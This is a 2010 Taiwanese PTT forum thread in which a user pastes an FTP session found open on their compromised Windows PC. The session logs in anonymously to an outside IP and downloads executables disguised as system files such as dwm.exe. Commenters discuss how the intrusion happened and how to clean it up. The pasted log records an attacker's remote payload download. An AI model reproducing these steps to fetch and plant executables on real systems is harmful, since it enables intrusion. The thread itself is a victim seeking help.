作者pobov (不應該存在的執念)
看板AntiVirus
標題一回家發現administrator被登入
時間Fri Jun 4 19:17:50 2010
一回家發現administrator被登入
進去一看,開了cmd視窗,
出現下列文字
Connected to 95.211.131.155.
220 (vsFTPd 2.0.7)
ftp> user anonymous a
331 Please specify the password.
230 Login successful.
ftp> binary
200 Switching to Binary mode.
ftp> literal pasv
227 Entering Passive Mode (95,211,131,155,207,212)
ftp> get Redirect.exe
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> get conhost.exe
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for conhost.exe (0 bytes).
226 File send OK.
ftp> get dwm.exe
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dwm.exe (69632 bytes).
226 File send OK.
ftp: 69632 bytes received in 1.81Seconds 38.43Kbytes/sec.
ftp> quit
221 Goodbye.
關鍵字: Redirect.exe conhost.exe dwm.exe
這是那一個病毒嗎?
--
[課程]99年度台灣史丹福醫療器材產品設計之人才培訓計畫
臨床培訓醫學中心課程 (第二年計畫)
招生海報、課程表網址:
http://mrilab.mc.ntu.edu.tw/99stb/
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 124.218.19.222
1F:推 hirokofan:看起來有抓下來的只有dwn.exe 06/04 23:08
2F:推 bestpika:跑去ftp載下來了,行為看起來只有把dwm.exe加進run而已 06/05 00:03
3F:推 kkhi:系統有大漏洞! administrator都被登入...對方可為所欲為 06/05 02:13
4F:推 chang0206:妳的admin帳號該不會沒有密碼吧? 06/05 18:08
5F:推 hirokofan:照道理administoator就算沒密碼,XP也不會讓人直接進 06/05 20:11
6F:→ cocalady:好像是有木馬利用admin暗中下載一些可能作為偷取個資的工 06/06 03:40
7F:→ cocalady:具到C槽中 而下載好的 dwm.exe等等 已被木馬利用command 06/06 03:41
8F:→ cocalady:line方式執行了 請搜尋dwm.exe 並用防毒軟體判斷是否為 06/06 03:43
9F:→ cocalady:spyware等等的東西 06/06 03:44
10F:推 ylok:你可以whois一下IP位置過去和他們反映 是Netherlands 06/06 06:13
11F:→ ylok:當然對方也有可能是殭屍被遙控的電腦 06/06 06:15
12F:→ ylok:不過你電腦會被登入表示主機有防護上漏洞 原PO防火牆防毒有嗎 06/06 06:16
13F:→ pobov:防毒是avira小紅傘,防火牆被我關掉很久了, 06/06 11:45
14F:→ pobov:有找了dwm.exe刪掉。admin密碼從控制台重設,就繼續用了XD 06/06 11:45
15F:推 ylok:建議要不要防火牆也開了? 然後全機掃瞄一下找有沒有Malware 06/06 13:00